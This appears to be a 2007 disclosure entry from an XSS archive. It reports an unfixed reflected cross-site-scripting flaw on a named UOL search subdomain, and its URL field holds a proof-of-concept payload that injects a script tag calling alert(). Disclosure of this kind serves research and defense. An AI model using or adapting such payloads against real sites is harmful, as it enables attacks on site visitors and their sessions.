Security researcher BugBuster, has submitted on 31/03/2007 a cross-site-scripting (XSS) vulnerability affecting vilabol.busca.uol.com.br, which at the time of submission ranked 34 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/04/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 31/03/2007 |
Date published: 01/04/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: BugBuster |
Domain: vilabol.busca.uol.com.br |
Category: XSS |
Pagerank: 34 |
URL: http://vilabol.busca.uol.com.br/uol/index.html?q=aaaaaa</title>http://vilabol.busca.uol.com.br/uol/i ndex.html?q=aaaaaaaaaaaaa</title><script>alert(String.fromCharCode(88,83,83,32,98,121,32,66,117,103, 66,117,115,116,101,114,32,45,32,76,101,105,97,32,98,117,103,98,117,115,116,101,114,46,99,111,109,46, 98,114));</script> |
Click here to view the mirror
|
|